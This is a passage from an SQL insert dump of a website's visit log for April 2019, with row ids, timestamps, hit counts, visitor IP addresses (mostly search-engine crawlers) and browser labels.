1555315950,2,2,0,0,'66.249.64.31','chrome'),(412936,1555316794,1,1,0,0,'91.196.178.87','chrome'),(412937,1555317346,1,1,0,0,'66.249.64.31','chrome'),(412938,1555317355,1,1,0,0,'8.29.198.26','other'),(412939,1555317706,3,3,0,0,'66.249.64.29','chrome'),(412940,1555317987,1,1,0,0,'173.44.41.254','firefox'),(412941,1555318303,1,1,0,0,'8.29.198.27','other'),(412942,1555318459,1,1,0,0,'91.196.178.189','chrome'),(412943,1555319719,1,1,0,0,'66.249.64.31','chrome'),(412944,1555319768,1,1,0,0,'109.74.154.72','chrome'),(412945,1555319844,1,1,0,0,'176.9.9.94','other'),(412946,1555319865,1,1,0,0,'66.249.64.29','chrome'),(412947,1555319918,1,1,0,0,'87.250.224.64','other'),(412948,1555319923,1,1,0,0,'66.249.64.30','chrome'),(412949,1555320117,1,1,0,0,'93.183.226.200','chrome'),(412950,1555320273,1,1,0,0,'37.9.113.13','other'),(412951,1555320366,1,1,0,0,'141.8.142.191','other'),(412952,1555320461,1,1,0,0,'5.255.253.22','other'),(412953,1555320480,1,1,0,0,'95.163.255.194','other'),(412954,1555320547,1,1,0,0,'37.9.113.103','other'),(412955,1555320797,1,1,0,0,'91.196.178.169','chrome'),(412956,1555321277,1,1,0,0,'180.76.15.11','other'),(412957,1555321474,2,2,0,0,'66.249.64.30','chrome'),(412958,1555321723,2,2,0,0,'40.77.167.26','other'),(412959,1555321917,1,1,0,0,'31.41.93.55','chrome'),(412960,1555322972,1,1,0,0,'66.249.64.30','chrome'),(412961,1555323135,1,1,0,0,'95.163.255.94','other'),(412962,1555323377,1,1,0,0,'62.80.171.90','chrome'),(412963,1555324008,2,2,0,0,'40.77.167.195','other'),(412964,1555324565,1,1,0,0,'5.45.207.19','other'),(412965,1555324892,1,1,0,0,'66.249.64.60','chrome'),(412966,1555324945,4,4,0,0,'66.249.64.29','chrome'),(412967,1555326340,1,1,0,0,'95.163.255.178','other'),(412968,1555326518,1,1,0,0,'66.249.64.29','chrome'),(412969,1555327690,1,1,0,0,'95.163.255.94','other'),(412970,1555327841,1,1,0,0,'207.46.13.149','other'),(412971,1555327879,2,2,0,0,'66.249.64.30','chrome'),(412972,1555327945,2,2,0,0,'66.249.64.31','chrome'),(412973,1555328207,1,1,0,0,'8.29.198.25','other'),(412974,1555328557,2,2,0,0,'5.45.207.79','other'),(412975,1555328561,1,1,0,0,'87.250.224.47','other'),(412976,1555328565,1,1,0,0,'87.250.224.65','other'),(412977,1555328661,1,1,0,0,'5.255.253.22','other'),(412978,1555329134,1,1,0,0,'8.29.198.26','other'),(412979,1555329238,1,1,0,0,'66.249.64.31','chrome'),(412980,1555329566,1,1,0,0,'5.45.207.79','other'),(412981,1555329636,2,2,0,0,'40.77.167.141','other'),(412982,1555329911,1,1,0,0,'66.249.64.29','chrome'),(412983,1555329955,1,1,0,0,'66.249.64.62','chrome'),(412984,1555330199,1,1,0,0,'207.46.13.8','other'),(412985,1555330316,1,1,0,0,'95.24.0.153','msie'),(412986,1555332417,2,2,0,0,'157.55.39.195','other'),(412987,1555332423,1,1,0,0,'95.163.255.167','other'),(412988,1555332528,2,2,0,0,'66.249.64.30','chrome'),(412989,1555333137,1,1,0,0,'66.249.64.29','chrome'),(412990,1555333765,2,2,0,0,'91.196.178.134','chrome'),(412991,1555333882,1,1,0,0,'91.196.179.134','chrome'),(412992,1555334142,1,1,0,0,'40.77.167.141','other'),(412993,1555334298,1,1,0,0,'66.249.64.62','chrome'),(412994,1555334365,1,1,0,0,'46.201.99.35','chrome'),(412995,1555334691,1,1,0,0,'93.171.245.229','chrome'),(412996,1555335230,1,1,0,0,'66.249.64.30','chrome'),(412997,1555335640,1,1,0,0,'66.249.64.62','chrome'),(412998,1555335700,2,2,0,0,'157.55.39.115','other'),(412999,1555335989,1,1,0,0,'180.76.15.153','other'),(413000,1555336034,1,1,0,0,'66.249.64.29','chrome'),(413001,1555336126,3,3,0,0,'66.249.64.31','chrome'),(413002,1555337273,1,1,0,0,'95.163.255.190','other'),(413003,1555337294,1,1,0,0,'95.163.255.185','other'),(413004,1555337507,1,1,0,0,'91.196.179.134','chrome'),(413005,1555337581,1,1,0,0,'66.249.64.29','chrome'),(413006,1555338003,1,1,0,0,'91.196.177.46','firefox'),(413007,1555338718,1,1,0,0,'95.163.255.97','other'),(413008,1555339057,1,1,0,0,'8.29.198.25','other'),(413009,1555339234,1,1,0,0,'66.249.64.30','chrome'),(413010,1555339461,1,1,0,0,'66.249.64.60','chrome'),(413011,1555339587,1,1,0,0,'95.163.255.93','other'),(413012,1555339900,2,2,0,0,'91.196.178.167','chrome'),(413013,1555339973,1,1,0,0,'8.29.198.25','other'),(413014,1555340800,1,1,0,0,'95.163.255.165','other'),(413015,1555341150,1,1,0,0,'40.77.167.176','other'),(413016,1555341160,1,1,0,0,'66.249.64.29','chrome'),(413017,1555341330,1,1,0,0,'95.163.255.150','other'),(413018,1555341369,1,1,0,0,'141.8.142.191','other'),(413019,1555341385,1,1,0,0,'66.249.64.31','chrome'),(413020,1555341548,1,1,0,0,'87.250.224.47','other'),(413021,1555342339,1,1,0,0,'40.77.167.176','other'),(413022,1555342641,1,1,0,0,'207.46.13.114','other'),(413023,1555344357,1,1,0,0,'66.249.64.29','chrome'),(413024,1555344536,1,1,0,0,'46.211.150.58','chrome'),(413025,1555344588,1,1,0,0,'13.66.139.0','other'),(413026,1555345087,1,1,0,0,'95.163.255.99','other'),(413027,1555345640,1,1,0,0,'40.77.167.176','other'),(413028,1555346027,1,1,0,0,'31.41.93.55','chrome'),(413029,1555346773,1,1,0,0,'66.249.64.31','chrome'),(413030,1555348134,1,1,0,0,'87.250.224.64','other'),(413031,1555348161,1,1,0,0,'40.77.167.176','other'),(413032,1555348591,1,1,0,0,'95.163.255.157','other'),(413033,1555348605,1,1,0,0,'40.77.167.190','other'),(413034,1555349343,1,1,0,0,'141.8.142.162','other'),(413035,1555349903,1,1,0,0,'8.29.198.26','other'),(413036,1555350809,1,1,0,0,'8.29.198.26','other'),(413037,1555351217,1,1,0,0,'202.180.34.186','other'),(413038,1555351277,1,1,0,0,'40.77.167.198','other'),(413039,1555351354,2,2,0,0,'40.77.167.190','other'),(413040,1555352024,1,1,0,0,'95.163.255.168','other'),(413041,1555352081,1,1,0,0,'93.72.93.35','firefox'),(413042,1555352146,1,1,0,0,'91.196.178.67','firefox'),(413043,1555352369,2,2,0,0,'207.46.13.114','other'),(413044,1555354451,1,1,0,0,'141.8.142.162','other'),(413045,1555354504,1,1,0,0,'213.180.203.48','other'),(413046,1555354534,1,1,0,0,'5.255.253.25','other'),(413047,1555354959,1,1,0,0,'5.45.207.80','other'),(413048,1555355149,1,1,0,0,'213.180.203.17','other'),(413049,1555355230,1,1,0,0,'5.45.207.19','other'),(413050,1555355234,1,1,0,0,'87.250.224.47','other'),(413051,1555355236,1,1,0,0,'213.180.203.9','other'),(413052,1555355239,1,1,0,0,'87.250.224.81','other'),(413053,1555355904,1,1,0,0,'40.77.167.190','other'),(413054,1555356474,1,1,0,0,'207.46.13.114','other'),(413055,1555356697,2,2,0,0,'95.213.141.126','opera'),(413056,1555356934,1,1,0,0,'40.77.167.67','other'),(413057,1555357781,1,1,0,0,'66.249.64.31','chrome'),(413058,1555358115,1,1,0,0,'91.196.178.135','chrome'),(413059,1555358493,1,1,0,0,'40.77.167.198','other'),(413060,1555358686,1,1,0,0,'66.249.64.29','chrome'),(413061,1555359141,1,1,0,0,'66.249.64.31','chrome'),(413062,1555359146,1,1,0,0,'66.249.64.58','chrome'),(413063,1555359267,1,1,0,0,'176.36.71.245','firefox'),(413064,1555359418,1,1,0,0,'52.53.201.78','chrome'),(413065,1555359842,1,1,0,0,'157.55.39.255','other'),(413066,1555360203,1,1,0,0,'40.77.167.198','other'),(413067,1555360303,2,2,0,0,'40.77.167.190','other'),(413068,1555360743,1,1,0,0,'8.29.198.27','other'),(413069,1555361206,1,1,0,0,'157.55.39.255','other'),(413070,1555361576,1,1,0,0,'5.255.253.25','other'),(413071,1555361646,1,1,0,0,'8.29.198.26','other'),(413072,1555361651,1,1,0,0,'180.76.15.144','other'),(413073,1555361689,1,1,0,0,'141.8.142.162','other'),(413074,1555361973,1,1,0,0,'66.249.64.60','chrome'),(413075,1555362642,1,1,0,0,'31.41.93.55','chrome'),(413076,1555362808,1,1,0,0,'66.249.64.31','chrome'),(413077,1555362859,1,1,0,0,'66.249.64.62','chrome'),(413078,1555363210,1,1,0,0,'95.163.255.185','other'),(413079,1555363217,3,3,0,0,'66.249.64.30','chrome'),(413080,1555363543,1,1,0,0,'207.46.13.164','other'),(413081,1555363739,3,3,0,0,'66.249.64.29','chrome'),(413082,1555363921,1,1,0,0,'66.249.64.58','chrome'),(413083,1555364240,2,2,0,0,'66.249.64.60','chrome'),(413084,1555364260,2,2,0,0,'157.55.39.210','other'),(413085,1555364740,1,1,0,0,'95.84.145.219','msie'),(413086,1555364826,2,2,0,0,'66.249.64.30','chrome'),(413087,1555365207,1,1,0,0,'91.209.11.236','other'),(413088,1555365225,2,2,0,0,'66.249.64.29','chrome'),(413089,1555365369,1,1,0,0,'66.249.64.31','chrome'),(413090,1555365815,1,1,0,0,'95.163.255.193','other'),(413091,1555365848,1,1,0,0,'95.163.255.177','other'),(413092,1555365876,1,1,0,0,'207.46.13.150','other'),(413093,1555366165,1,1,0,0,'157.55.39.255','other'),(413094,1555366364,1,1,0,0,'40.77.167.119','other'),(413095,1555366487,1,1,0,0,'40.77.167.175','other'),(413096,1555366980,300,300,0,0,'82.193.102.149','other'),(413097,1555367343,178,178,0,0,'176.9.140.208','other'),(413098,1555367468,1,1,0,0,'66.249.64.62','chrome'),(413099,1555368146,1,1,0,0,'213.180.203.17','other'),(413100,1555368237,1,1,0,0,'95.108.213.4','other'),(413101,1555368248,2,2,0,0,'176.9.140.208','other'),(413102,1555368297,1,1,0,0,'37.9.113.103','other'),(413103,1555368649,2,2,0,0,'157.55.39.130','other'),(413104,1555369357,1,1,0,0,'207.46.13.150','other'),(413105,1555369672,3,3,0,0,'157.55.39.130','other'),(413106,1555370236,1,1,0,0,'180.76.15.135','other'),(413107,1555370563,1,1,0,0,'66.249.64.31','chrome'),(413108,1555370566,4,4,0,0,'66.249.64.30','chrome'),(413109,1555370629,2,2,0,0,'66.249.64.29','chrome'),(413110,1555371215,1,1,0,0,'66.249.64.58','chrome'),(413111,1555371587,2,2,0,0,'66.249.64.30','chrome'),(413112,1555371589,1,1,0,0,'8.29.198.27','other'),(413113,1555371866,1,1,0,0,'66.249.64.29','chrome'),(413114,1555372383,1,1,0,0,'157.55.39.255','other'),(413115,1555372446,1,1,0,0,'213.180.203.48','other'),(413116,1555372477,1,1,0,0,'8.29.198.26','other'),(413117,1555372610,1,1,0,0,'141.8.142.81','other'),(413118,1555372696,1,1,0,0,'95.163.255.96','other'),(413119,1555372698,1,1,0,0,'95.163.255.92','other'),(413120,1555373037,2,2,0,0,'66.249.64.30','chrome'),(413121,1555373114,1,1,0,0,'66.249.64.29','chrome'),(413122,1555373154,1,1,0,0,'66.249.64.60','chrome'),(413123,1555373678,1,1,0,0,'46.166.186.194','other'),(413124,1555373858,1,1,0,0,'157.55.39.69','other'),(413125,1555374458,2,2,0,0,'207.46.13.150','other'),(413126,1555374492,2,2,0,0,'66.249.64.29','chrome'),(413127,1555374545,1,1,0,0,'66.249.64.60','chrome'),(413128,1555374931,1,1,0,0,'95.163.255.170','other'),(413129,1555375187,1,1,0,0,'157.55.39.69','other'),(413130,1555375340,2,2,0,0,'66.249.64.30','chrome'),(413131,1555376107,1,1,0,0,'207.46.13.150','other'),(413132,1555376308,1,1,0,0,'157.55.39.69','other'),(413133,1555376365,1,1,0,0,'66.249.64.62','chrome'),(413134,1555376417,1,1,0,0,'18.237.157.50','other'),(413135,1555376502,2,2,0,0,'66.249.64.31','chrome'),(413136,1555376572,1,1,0,0,'141.8.142.81','other'),(413137,1555376618,1,1,0,0,'5.45.207.76','other'),(413138,1555378440,1,1,0,0,'157.55.39.61','other'),(413139,1555378839,2,2,0,0,'66.249.64.29','chrome'),(413140,1555379042,2,2,0,0,'66.249.64.30','chrome'),(413141,1555379596,1,1,0,0,'54.227.49.133','other'),(413142,1555379875,1,1,0,0,'66.249.64.60','chrome'),(413143,1555380042,3,3,0,0,'157.55.39.69','other'),(413144,1555380048,1,1,0,0,'157.55.39.53','other'),(413145,1555380229,2,2,0,0,'66.249.64.31','chrome'),(413146,1555380566,1,1,0,0,'213.180.203.48','other'),(413147,1555380634,1,1,0,0,'66.249.64.29','chrome'),(413148,1555381307,1,1,0,0,'66.249.64.31','chrome'),(413149,1555381430,1,1,0,0,'178.154.200.8','other'),(413150,1555381438,1,1,0,0,'157.55.39.107','other'),(413151,1555381578,1,1,0,0,'178.63.13.154','other'),(413152,1555381580,1,1,0,0,'66.249.64.62','chrome'),(413153,1555382407,1,1,0,0,'157.55.39.107','other'),(413154,1555382429,2,2,0,0,'8.29.198.25','other'),(413155,1555382814,1,1,0,0,'66.249.64.60','chrome'),(413156,1555382927,1,1,0,0,'157.55.39.53','other'),(413157,1555383149,1,1,0,0,'66.249.64.29','chrome'),(413158,1555383383,2,2,0,0,'54.149.169.233','chrome'),(413159,1555383539,1,1,0,0,'66.249.64.31','chrome'),(413160,1555383830,1,1,0,0,'157.55.39.53','other'),(413161,1555384579,1,1,0,0,'95.163.255.97','other'),(413162,1555384733,1,1,0,0,'157.55.39.53','other'),(413163,1555385746,1,1,0,0,'157.55.39.69','other'),(413164,1555387045,1,1,0,0,'193.106.30.98','firefox'),(413165,1555387276,1,1,0,0,'157.55.39.53','other'),(413166,1555387410,1,1,0,0,'95.163.255.197','other'),(413167,1555387496,1,1,0,0,'207.46.13.105','other'),(413168,1555387823,1,1,0,0,'91.196.178.134','firefox'),(413169,1555387853,1,1,0,0,'66.249.64.30','chrome'),(413170,1555388822,1,1,0,0,'212.90.45.139','firefox'),(413171,1555388946,1,1,0,0,'66.249.64.58','chrome'),(413172,1555389181,1,1,0,0,'66.249.64.30','chrome'),(413173,1555389342,1,1,0,0,'157.55.39.184','other'),(413174,1555389548,1,1,0,0,'207.46.13.105','other'),(413175,1555390325,1,1,0,0,'157.55.39.188','other'),(413176,1555390613,1,1,0,0,'66.249.64.29','chrome'),(413177,1555390660,2,2,0,0,'178.154.244.11','other'),(413178,1555391106,1,1,0,0,'93.158.166.7','other'),(413179,1555391125,1,1,0,0,'66.249.64.30','chrome'),(413180,1555391151,1,1,0,0,'92.113.47.115','chrome'),(413181,1555391396,1,1,0,0,'207.46.13.105','other'),(413182,1555391625,1,1,0,0,'157.55.39.184','other'),(413183,1555392099,1,1,0,0,'13.66.139.0','other'),(413184,1555392300,1,1,0,0,'109.69.88.115','chrome'),(413185,1555392319,1,1,0,0,'5.45.207.76','other'),(413186,1555392497,1,1,0,0,'31.220.40.54','other'),(413187,1555392881,1,1,0,0,'91.196.179.134','chrome'),(413188,1555393066,1,1,0,0,'157.55.39.188','other'),(413189,1555393260,200,200,0,0,'5.9.112.210','other'),(413190,1555393269,1,1,0,0,'8.29.198.25','other'),(413191,1555394135,1,1,0,0,'8.29.198.27','other'),(413192,1555394195,1,1,0,0,'157.55.39.182','other'),(413193,1555394909,2,2,0,0,'91.196.177.46','chrome'),(413194,1555394968,1,1,0,0,'157.55.39.157','other'),(413195,1555394981,1,1,0,0,'213.180.203.9','other'),(413196,1555394993,1,1,0,0,'178.154.171.69','other'),(413197,1555395297,1,1,0,0,'157.55.39.182','other'),(413198,1555395384,1,1,0,0,'176.37.96.237','chrome'),(413199,1555395625,1,1,0,0,'95.163.255.94','other'),(413200,1555395898,1,1,0,0,'95.163.255.187','other'),(413201,1555396244,1,1,0,0,'66.249.64.60','chrome'),(413202,1555396325,1,1,0,0,'157.55.39.184','other'),(413203,1555396865,1,1,0,0,'66.249.64.31','chrome'),(413204,1555397689,16,16,0,0,'148.251.49.107','other'),(413205,1555397851,1,1,0,0,'66.249.64.30','chrome'),(413206,1555397913,1,1,0,0,'193.93.53.167','chrome'),(413207,1555397917,1,1,0,0,'66.249.64.29','chrome'),(413208,1555397935,2,2,0,0,'157.55.39.236','other'),(413209,1555398169,1,1,0,0,'193.106.30.98','firefox'),(413210,1555398562,1,1,0,0,'37.53.93.138','chrome'),(413211,1555399062,2,2,0,0,'157.55.39.157','other'),(413212,1555399402,1,0,1,0,'66.249.64.30',''),(413213,1555399467,1,1,0,0,'69.4.87.74','chrome'),(413214,1555399468,1,1,0,0,'69.4.87.74','firefox'),(413215,1555399504,1,1,0,0,'91.196.179.134','chrome'),(413216,1555400511,1,1,0,0,'141.8.142.162','other'),(413217,1555400671,1,1,0,0,'157.55.39.236','other'),(413218,1555400688,1,1,0,0,'95.108.181.94','other'),(413219,1555400801,1,1,0,0,'66.249.64.62','chrome'),(413220,1555401240,1,1,0,0,'185.41.23.54','chrome'),(413221,1555401435,1,1,0,0,'91.209.11.236','other'),(413222,1555401515,1,1,0,0,'157.55.39.157','other'),(413223,1555401727,1,1,0,0,'66.249.64.31','chrome'),(413224,1555402110,1,1,0,0,'66.249.64.60','chrome'),(413225,1555402171,2,2,0,0,'66.249.64.29','chrome'),(413226,1555402770,1,1,0,0,'42.236.10.106','other'),(413227,1555402805,1,1,0,0,'180.163.220.4','other'),(413228,1555402877,1,1,0,0,'180.163.220.5','other'),(413229,1555402904,1,1,0,0,'46.200.250.89','chrome'),(413230,1555402927,2,2,0,0,'205.153.155.0','other'),(413231,1555403108,1,1,0,0,'95.108.181.83','other'),(413232,1555403332,1,1,0,0,'176.102.192.103','chrome'),(413233,1555403614,1,1,0,0,'188.255.39.237','msie'),(413234,1555404109,1,1,0,0,'8.29.198.27','other'),(413235,1555404842,1,1,0,0,'157.55.39.182','other'),(413236,1555404857,1,1,0,0,'66.249.64.29','chrome'),(413237,1555404985,1,1,0,0,'8.29.198.26','other'),(413238,1555405359,1,1,0,0,'109.74.154.72','chrome'),(413239,1555405573,1,1,0,0,'89.252.21.52','other'),(413240,1555405728,2,2,0,0,'91.196.178.134','chrome'),(413241,1555405821,1,1,0,0,'157.55.39.184','other'),(413242,1555405822,1,1,0,0,'178.79.190.123','firefox'),(413243,1555406215,1,1,0,0,'95.132.4.107','chrome'),(413244,1555406566,2,2,0,0,'66.249.64.31','chrome'),(413245,1555407101,1,1,0,0,'157.55.39.157','other'),(413246,1555407208,1,1,0,0,'66.249.64.60','chrome'),(413247,1555407635,1,1,0,0,'157.55.39.184','other'),(413248,1555408166,1,1,0,0,'66.249.64.29','chrome'),(413249,1555408334,1,1,0,0,'157.55.39.157','other'),(413250,1555408415,1,1,0,0,'46.211.133.206','chrome'),(413251,1555408615,1,1,0,0,'66.249.64.31','chrome'),(413252,1555408754,1,1,0,0,'207.46.13.148','other'),(413253,1555408991,1,1,0,0,'37.52.121.188','chrome'),(413254,1555409025,1,1,0,0,'13.66.139.0','other'),(413255,1555409509,1,1,0,0,'5.45.207.19','other'),(413256,1555409697,1,1,0,0,'31.128.79.246','chrome'),(413257,1555410416,1,1,0,0,'66.249.64.30','chrome'),(413258,1555411861,1,1,0,0,'40.77.167.167','other'),(413259,1555412495,1,1,0,0,'93.119.227.34','firefox'),(413260,1555412496,1,1,0,0,'93.119.227.34','chrome'),(413261,1555413433,1,1,0,0,'31.128.79.246','chrome'),(413262,1555413912,1,1,0,0,'207.46.13.148','other'),(413263,1555414968,2,2,0,0,'8.29.198.27','other'),(413264,1555415297,1,1,0,0,'91.196.178.175','chrome'),(413265,1555415298,1,1,0,0,'66.249.64.62','chrome'),(413266,1555415305,2,2,0,0,'91.196.177.15','chrome'),(413267,1555416404,1,1,0,0,'91.196.178.71','firefox'),(413268,1555416602,1,1,0,0,'176.9.9.94','other'),(413269,1555416872,1,1,0,0,'91.196.178.175','chrome'),(413270,1555417497,1,1,0,0,'91.242.162.135','other'),(413271,1555418212,1,1,0,0,'194.44.191.122','chrome'),(413272,1555418814,1,1,0,0,'40.77.167.141','other'),(413273,1555419651,1,1,0,0,'91.196.178.175','chrome'),(413274,1555420765,1,1,0,0,'193.106.30.98','firefox'),(413275,1555421376,1,1,0,0,'157.55.39.157','other'),(413276,1555421424,1,1,0,0,'91.196.178.135','chrome'),(413277,1555421532,1,1,0,0,'62.244.4.94','chrome'),(413278,1555421632,1,1,0,0,'91.196.178.83','chrome'),(413279,1555421764,1,1,0,0,'93.72.93.35','chrome'),(413280,1555422345,1,1,0,0,'66.249.64.29','chrome'),(413281,1555422460,1,1,0,0,'91.196.178.101','chrome'),(413282,1555423358,1,1,0,0,'207.46.13.149','other'),(413283,1555423510,1,1,0,0,'91.196.177.15','chrome'),(413284,1555423865,1,1,0,0,'66.249.64.31','chrome'),(413285,1555424496,2,2,0,0,'141.8.142.103','other'),(413286,1555424521,1,1,0,0,'95.108.181.83','other'),(413287,1555424522,1,1,0,0,'188.32.136.113','msie'),(413288,1555424546,1,1,0,0,'180.76.15.135','other'),(413289,1555424563,1,1,0,0,'66.249.64.62','chrome'),(413290,1555424584,1,1,0,0,'37.9.113.38','other'),(413291,1555424642,1,1,0,0,'66.249.64.29','chrome'),(413292,1555424834,1,1,0,0,'91.196.178.56','chrome'),(413293,1555424914,1,1,0,0,'213.180.203.53','other'),(413294,1555424915,1,1,0,0,'66.249.64.30','chrome'),(413295,1555425832,1,1,0,0,'8.29.198.25','other'),(413296,1555425856,3,3,0,0,'66.249.64.30','chrome'),(413297,1555426155,1,1,0,0,'95.108.213.4','other'),(413298,1555426249,1,1,0,0,'141.8.142.65','other'),(413299,1555426258,1,1,0,0,'207.46.13.149','other'),(413300,1555426476,1,1,0,0,'93.158.166.7','other'),(413301,1555426478,1,1,0,0,'37.9.113.103','other'),(413302,1555426642,1,1,0,0,'95.108.213.50','other'),(413303,1555426670,1,1,0,0,'8.29.198.27','other'),(413304,1555426705,1,1,0,0,'46.211.97.17','chrome'),(413305,1555426966,1,1,0,0,'40.77.167.141','other'),(413306,1555427094,1,1,0,0,'95.108.213.4','other'),(413307,1555427552,1,1,0,0,'66.249.64.62','chrome'),(413308,1555427581,1,1,0,0,'207.46.13.65','other'),(413309,1555427588,1,1,0,0,'66.249.64.31','chrome'),(413310,1555428972,1,1,0,0,'157.55.39.218','other'),(413311,1555429991,1,1,0,0,'40.77.167.34','other'),(413312,1555430074,1,1,0,0,'109.87.139.84','chrome'),(413313,1555430336,1,1,0,0,'40.77.167.141','other'),(413314,1555431017,1,1,0,0,'180.76.15.12','other'),(413315,1555431602,1,1,0,0,'157.55.39.218','other'),(413316,1555431927,2,2,0,0,'40.77.167.34','other'),(413317,1555432042,3,3,0,0,'40.77.167.141','other'),(413318,1555432134,1,1,0,0,'66.249.64.60','chrome'),(413319,1555432516,1,1,0,0,'157.55.39.218','other'),(413320,1555432980,1,1,0,0,'40.77.167.141','other'),(413321,1555433705,1,1,0,0,'157.55.39.218','other'),(413322,1555433712,2,2,0,0,'66.249.64.29','chrome'),(413323,1555433799,1,1,0,0,'66.249.64.58','chrome'),(413324,1555434730,2,2,0,0,'40.77.167.141','other'),(413325,1555434784,1,1,0,0,'91.196.178.175','chrome'),(413326,1555434866,4,4,0,0,'66.249.64.30','chrome'),(413327,1555435108,2,2,0,0,'66.249.64.29','chrome'),(413328,1555436676,2,2,0,0,'8.29.198.25','other'),(413329,1555437390,1,1,0,0,'66.249.64.31','chrome'),(413330,1555437738,1,1,0,0,'66.249.64.58','chrome'),(413331,1555437905,1,1,0,0,'66.249.64.60','chrome'),(413332,1555438376,1,1,0,0,'66.249.64.29','chrome'),(413333,1555438396,1,1,0,0,'66.249.64.31','chrome'),(413334,1555439369,1,1,0,0,'66.249.64.29','chrome'),(413335,1555439404,2,2,0,0,'66.249.64.31','chrome'),(413336,1555439861,1,1,0,0,'5.45.207.19','other'),(413337,1555439890,1,1,0,0,'87.250.224.47','other'),(413338,1555439913,1,1,0,0,'54.183.236.248','chrome'),(413339,1555440213,1,1,0,0,'95.108.181.94','other'),(413340,1555440219,2,2,0,0,'5.255.253.22','other'),(413341,1555440257,1,1,0,0,'40.77.167.141','other'),(413342,1555440506,1,1,0,0,'141.8.142.103','other'),(413343,1555440593,1,1,0,0,'87.250.224.107','other'),(413344,1555440638,1,1,0,0,'31.13.127.10','other'),(413345,1555440640,1,1,0,0,'31.13.127.12','other'),(413346,1555440648,1,1,0,0,'31.13.115.4','other'),(413347,1555440652,1,1,0,0,'185.246.208.38','other'),(413348,1555440720,2,2,0,0,'66.249.64.31','chrome'),(413349,1555440723,1,1,0,0,'213.180.203.23','other'),(413350,1555440745,1,1,0,0,'185.246.208.38','chrome'),(413351,1555440826,3,3,0,0,'66.249.64.29','chrome'),(413352,1555440950,1,1,0,0,'198.16.66.156','chrome'),(413353,1555441039,1,1,0,0,'31.13.115.21','other'),(413354,1555441067,1,1,0,0,'173.252.87.10','other'),(413355,1555441332,1,1,0,0,'91.196.178.19','chrome'),(413356,1555441522,1,1,0,0,'40.77.167.29','other'),(413357,1555441583,1,1,0,0,'213.180.203.17','other'),(413358,1555441614,1,1,0,0,'40.77.167.176','other'),(413359,1555441670,2,2,0,0,'185.246.208.38','other'),(413360,1555441762,1,1,0,0,'91.196.178.165','chrome'),(413361,1555441787,1,1,0,0,'66.249.64.58','chrome'),(413362,1555441802,1,1,0,0,'46.211.10.216','chrome'),(413363,1555442027,1,1,0,0,'178.94.172.15','chrome'),(413364,1555442359,1,1,0,0,'95.108.181.94','other'),(413365,1555442517,1,1,0,0,'46.211.149.169','chrome'),(413366,1555442724,2,2,0,0,'66.249.64.31','chrome'),(413367,1555442737,1,1,0,0,'66.249.64.29','chrome'),(413368,1555442970,1,1,0,0,'198.16.66.156','chrome'),(413369,1555444444,2,2,0,0,'157.55.39.169','other'),(413370,1555444751,1,1,0,0,'66.249.64.31','chrome'),(413371,1555444963,1,1,0,0,'66.249.64.30','chrome'),(413372,1555445078,2,2,0,0,'40.77.167.174','other'),(413373,1555445176,1,1,0,0,'178.94.172.15','chrome'),(413374,1555445934,3,3,0,0,'66.249.64.58','chrome'),(413375,1555446126,1,1,0,0,'66.249.64.30','chrome'),(413376,1555446247,1,1,0,0,'157.55.39.158','other'),(413377,1555446366,1,1,0,0,'40.77.167.176','other'),(413378,1555446771,1,1,0,0,'31.13.127.2','other'),(413379,1555446874,1,1,0,0,'46.211.126.84','chrome'),(413380,1555447393,1,1,0,0,'46.96.5.178','chrome'),(413381,1555447526,1,1,0,0,'8.29.198.27','other'),(413382,1555448201,3,3,0,0,'66.249.64.29','chrome'),(413383,1555448339,1,1,0,0,'8.29.198.26','other'),(413384,1555448864,1,1,0,0,'176.15.231.136','firefox'),(413385,1555449449,1,1,0,0,'66.249.64.30','chrome'),(413386,1555450091,2,2,0,0,'66.249.64.31','chrome'),(413387,1555450202,1,1,0,0,'66.249.64.29','chrome'),(413388,1555450421,1,1,0,0,'66.249.64.30','chrome'),(413389,1555450515,1,1,0,0,'207.46.13.111','other'),(413390,1555451320,2,2,0,0,'66.249.64.31','chrome'),(413391,1555451444,1,1,0,0,'31.184.238.22','chrome'),(413392,1555451603,1,1,0,0,'141.8.142.81','other'),(413393,1555451612,1,1,0,0,'141.8.142.162','other'),(413394,1555451728,1,1,0,0,'178.154.171.60','other'),(413395,1555452790,1,1,0,0,'66.249.64.31','chrome'),(413396,1555452810,1,1,0,0,'213.180.203.17','other'),(413397,1555453187,1,1,0,0,'66.249.64.60','chrome'),(413398,1555453671,1,1,0,0,'180.76.15.25','other'),(413399,1555454711,1,1,0,0,'157.55.39.162','other'),(413400,1555454899,1,1,0,0,'5.45.207.76','other'),(413402,1555455473,1,1,0,0,'157.55.39.190','other'),(413403,1555456920,1,1,0,0,'157.55.39.162','other'),(413404,1555457544,1,1,0,0,'66.249.64.31','chrome'),(413405,1555458030,1,1,0,0,'66.249.64.30','chrome'),(413406,1555458264,1,1,0,0,'66.249.64.60','chrome'),(413407,1555458370,1,1,0,0,'8.29.198.27','other'),(413408,1555458726,2,2,0,0,'40.77.167.2','other'),(413409,1555459168,1,1,0,0,'8.29.198.25','other'),(413410,1555459335,2,2,0,0,'66.249.64.62','chrome'),(413411,1555459492,1,1,0,0,'66.249.64.29','chrome'),(413412,1555460129,1,1,0,0,'66.249.64.60','chrome'),(413413,1555460175,2,2,0,0,'66.249.64.30','chrome'),(413414,1555460645,1,1,0,0,'66.249.64.29','chrome'),(413415,1555460852,1,1,0,0,'52.70.146.155','chrome'),(413416,1555461393,1,1,0,0,'5.45.207.8','other'),(413417,1555461433,1,1,0,0,'207.46.13.111','other'),(413418,1555461650,1,1,0,0,'213.180.203.40','other'),(413419,1555461917,1,1,0,0,'95.108.213.4','other'),(413420,1555461953,1,1,0,0,'95.108.181.54','other'),(413421,1555462523,1,1,0,0,'209.17.97.122','other'),(413422,1555462759,1,1,0,0,'54.201.132.87','other'),(413423,1555463569,2,2,0,0,'40.77.167.180','other'),(413424,1555464196,2,2,0,0,'157.55.39.162','other'),(413425,1555464454,1,1,0,0,'178.154.244.11','other'),(413426,1555465111,1,1,0,0,'157.55.39.190','other'),(413427,1555465353,1,1,0,0,'66.249.64.31','chrome'),(413428,1555465370,1,1,0,0,'180.76.15.136','other'),(413429,1555469217,1,1,0,0,'8.29.198.25','other'),(413430,1555469687,1,1,0,0,'157.55.39.69','other'),(413431,1555469780,2,2,0,0,'52.25.92.225','chrome'),(413432,1555469998,1,1,0,0,'8.29.198.27','other'),(413433,1555470605,1,1,0,0,'157.55.39.69','other'),(413434,1555471132,1,1,0,0,'87.250.224.99','other'),(413435,1555471286,2,0,2,0,'66.249.64.31',''),(413436,1555471311,1,0,1,0,'66.249.64.29',''),(413437,1555471764,1,1,0,0,'178.154.200.8','other'),(413438,1555